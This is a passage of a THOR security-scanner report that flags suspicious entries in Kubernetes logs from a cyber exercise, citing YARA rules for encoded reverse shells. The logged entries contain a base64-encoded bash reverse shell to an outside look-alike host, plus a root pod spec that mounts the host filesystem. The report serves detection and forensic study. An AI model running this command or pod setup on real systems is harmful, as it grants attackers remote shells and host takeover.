/bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\"","pid":164760,"cwd":"/home/utils","start_time":"2024-09-03T14:17:20.402209123Z","docker":"11c3efd882aa61732eccba3bdd9d6db","parent_exec_id":"azhzLW5vZGUwMTo5NzA4NzE4NzUyMzc1MDc6MTY0NzQ2","tid":164760,"uid":0,"binary":"/bin/sh","pod":{"name":"mlops-metrics","workload_kind":"Pod","container":{"id":"cri-o://11c3efd882aa6173
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 10
Sep 10 18:39:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"moI_uJEBNKI3r7qcaSsw","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:22.150Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzMwMzI5MjQ6MTY0Nzgw\", \"pid\":164780, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/usr/bin/base64\", \"arguments\":\"-d\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:20.403096678Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://11c3efd882aa61732eccba3bdd9d6db3cc4128c22036953fd9609d43620c277b\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"pid\":8}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"11c3efd882aa61732eccba3bdd9d6db\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzIxNDUwMDY6MTY0NzYw\", \"tid\":164780}, \"parent\":{\"exec_[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]bdd9d6db3cc4128c22036953fd9609d43620c277b","name":"mlops-metrics","pid":8,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4NzE5MzMwMzI5MjQ6MTY0Nzgw"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\"","pid":164760,"cwd":"/home/utils","start_time":"2024-09-03T14:17:20.402209123Z","docker":"11c3efd882
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 11
Sep 10 18:39:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"bII_uJEBNKI3r7qcaSsv","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:22.150Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzMwNTIzMzE6MTY0Nzgx\", \"pid\":164781, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/bash\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:20.403116085Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://11c3efd882aa61732eccba3bdd9d6db3cc4128c22036953fd9609d43620c277b\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"pid\":9}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"11c3efd882aa61732eccba3bdd9d6db\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzIxNDUwMDY6MTY0NzYw\", \"tid\":164781}, \"parent\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4N[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]rics","pid":9,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4NzE5MzMwNTIzMzE6MTY0Nzgx"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\"","pid":164760,"cwd":"/home/utils","start_time":"2024-09-03T14:17:20.402209123Z","docker":"11c3efd882aa61732eccba3bdd9d6db","parent_exec_id":"azhzLW5vZGUwMTo5NzA
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 12
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"rYI-uJEBNKI3r7qc8xbx","_score":1,"_source":{"@timestamp":"2024-09-03T14:16:49.946Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"9d73066b-0f58-4778-8e79-7f199f2e21e2\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods?fieldManager=kubectl-client-side-apply\\u0026fieldValidation=Strict\",\"verb\":\"create\",\"user\":{\"username\":\"system:serviceaccount:prod:prod-pod-creator\",\"uid\":\"09efc0da-119d-4977-bfa3-a2036547d714\",\"groups\":[\"system:serviceaccounts\",\"system:serviceaccounts:prod\",\"system:authenticated\"],\"extra\":{\"authentication.kubernetes.io/pod-name\":[\"mercury-mlflow-6f9d898884-ddtt9\"],\"authentication.kubernetes.io/pod-uid\":[\"dbd80eda-95e5-4b05-86e0-b649bf8733ba\"]}},\"sourceIPs\":[\"10.244.85.228\"],\"userAgent\":\"kubec[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...]am/utils\",\"args\":[\"sh\",\"-c\",\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"],\"resources\":{},\"volumeMounts\":[{\"name\":\[...]bels\\\":{\\\"app\\\":\\\"mlops-metrics\\\"},\\\"name\\\":\\\"mlops-metrics\\\",\\\"namespace\\\":\\\"prod\\\"},\\\"spec\\\":{\\\"containers\\\":[{\\\"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\\"name\\\":\\\"mlops-metrics\\\",\\\"securityContext\\\":{\\\"runAsUser\\\":0},\\\"volumeMounts\\\":[{\\\"mountPath\\\":\\\"/host\\\",\\\"name\\\":\\\"hostvolume\\\"}]}],\\\"volumes\\\":[{\\\"hostPath\\\":{\\\"path\\\":\\\"/\\\",\\\"type\\\":\\\"Directory\\\"},\\\"name\\\":\\\"hostvolume\\\"}]}}\\n\"},\"managedFields\":[{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersio
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1:
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2:
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Notices
Notice 1
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
Notice 2
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
Notice 3
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
Notice 4
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
Notice 5
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
Notice 6
Sep 10 18:47:10 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Report
MESSAGE:
Thor Scan finished
END_TIME:
Tue Sep 10 18:47:10 2024
ALERTS:
0
WARNINGS:
12
NOTICES:
5
ERRORS:
0